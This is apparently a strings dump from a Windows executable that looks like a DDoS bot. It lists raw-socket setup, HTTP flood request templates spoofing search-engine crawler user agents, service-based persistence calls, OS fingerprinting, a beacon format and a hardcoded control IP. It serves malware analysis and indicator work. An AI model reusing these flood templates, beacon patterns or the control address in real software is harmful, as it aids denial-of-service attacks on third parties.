!This program cannot be run in DOS mode.
Rich!l
`.rdata
@.data
aPhD{@
aPhX{@
GetTickCount
GetCurrentProcessId
ExitThread
CloseHandle
WriteFile
CreateFileA
FreeLibrary
GetProcAddress
LoadLibraryA
GetLastError
GetFileAttributesA
CreateProcessA
CreateThread
GetSystemInfo
WaitForSingleObject
MoveFileExA
MoveFileA
GetTempPathA
GetModuleFileNameA
lstrlenA
CopyFileA
GlobalMemoryStatus
GetModuleHandleA
KERNEL32.dll
wsprintfA
MessageBoxA
USER32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyA
RegOpenKeyExA
SetServiceStatus
RegisterServiceCtrlHandlerA
StartServiceCtrlDispatcherA
CloseServiceHandle
RegSetValueExA
StartServiceA
OpenServiceA
UnlockServiceDatabase
ChangeServiceConfig2A
LockServiceDatabase
CreateServiceA
OpenSCManagerA
ADVAPI32.dll
WSASocketA
WSAIoctl
WS2_32.dll
sprintf
memset
printf
fprintf
memcpy
_except_handler3
_local_unwind2
strlen
??3@YAXPAX@Z
strrchr
??2@YAPAXI@Z
strstr
strcpy
strcat
strncmp
malloc
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetIfTable
iphlpapi.dll
GetStartupInfoA
Eliminate small Japanese
164.155.205.99
phqghumeay
lnlfdxfircvscxggbwkf
nqduxwfnfozvsrtkjprepggxrpnrvy
WSAStartup failed: %d
WSASocket() failed: %d
Set IP_HDRINCL Error!
%d.%d.%d.%d
GET %s HTTP/1.1
%c%c%c%c%c%c%c%c%s
%c%c%c%c%c%c%c%c.%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: %s
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: %s:%d
Connection: Keep-Alive
POST %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: %s
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: %s:%d
Connection: Keep-Alive
GET %s HTTP/1.1
Host: %s
GET %s HTTP/1.1
Host: %s:%d
WSAStartup failed: %d
WSASocket() failed: %d
Set IP_HDRINCL Error!
%d.%d.%d.%d
GET %s HTTP/1.1
%c%c%c%c%c%c%c%c%s
%c%c%c%c%c%c%c%c.%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: %s
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: %s:%d
Connection: Keep-Alive
POST %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: %s
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: %s:%d
Connection: Keep-Alive
GET %s HTTP/1.1
Host: %s
GET %s HTTP/1.1
Host: %s:%d
wininet.dll
InternetOpenA
MSIE 6.0
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
WinSta0\Default
HARDWARE\DESCRIPTION\System\CentralProcessor\0
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Windows Server 2000
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows 2012
Windows 8
Windows 10
Windows NT
XXOOXXOO:%s|%d|%d|%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Windows Server 2000
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows 2012
Windows 8
Windows 10
Windows NT
XXOOXXOO:%s|%d|%d|%s
KERNEL32.dll
System%c%c%c.exe
NtQuerySystemInformation
jjjjjj
jjjjjj